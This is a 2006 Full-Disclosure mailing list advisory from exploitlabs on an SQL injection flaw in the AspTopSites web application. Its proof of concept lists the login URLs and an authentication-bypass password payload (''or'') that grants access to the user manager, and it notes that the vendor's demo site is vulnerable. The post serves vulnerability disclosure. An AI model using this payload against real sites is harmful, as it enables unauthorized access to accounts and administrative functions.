[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] AspTopSites SQL injection
- To: <full-disclosure@xxxxxxxxxxxxxxxxx>
- Subject: [Full-disclosure] AspTopSites SQL injection
- From: "Morning Wood" <se_cur_ity@xxxxxxxxxxx>
- Date: Tue, 10 Jan 2006 11:25:04 -0800
------------------------------------------------------------
- EXPL-A-2006-001 exploitlabs.com Advisory 047 -
------------------------------------------------------------
- AspTopSites -
AFFECTED PRODUCTS
=================
AspTopSites
http://www.maine-net.com/aspts.asp
OVERVIEW
========
AspTopSites® runs on your Windows NT/2K/2003 Server
and uses Active Server Pages with a MS Access 2000 database.
Simply upload AspTopSites®, make one configuration setting
and you're ready to start running your own TopSites traffic
generator. AspTopSites® comes with full source code...
no encoding or DLLs need to be installed on the server.
DETAILS
=======
1. SQL Injection
AspTopSites does not filter SQL resulting in
full access to the user manager menu.
POC
===
1.
---
entering SQL Injection type statement in the password field
causes the statement to be true.
http://[host]/topsites/default.asp <--- view listings
http://[host]/topsites/goto.asp?id=43 <--- mouseover id value
http://[host]/topsites/includeloginuser.asp <--- login here
user: [ id value ]
password: 'or'
note: Vendor Demo Site is Vuln
SOLUTION:
=========
vendor contact:
Jan 3, 2006 wills@xxxxxxxxxxxxx ( no resp )
Jan 10, 2006 ( no resp => release )
Credits
=======
This vulnerability was discovered and researched by
Donnie Werner of exploitlabs
Donnie Werner
mail: wood at exploitlabs.com
mail: morning_wood at zone-h.org
--
web: http://exploitlabs.com
web: http://zone-h.org
http://www.exploitlabs.com/files/advisories/EXPL-A-2006-001-asptopsites.txt
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/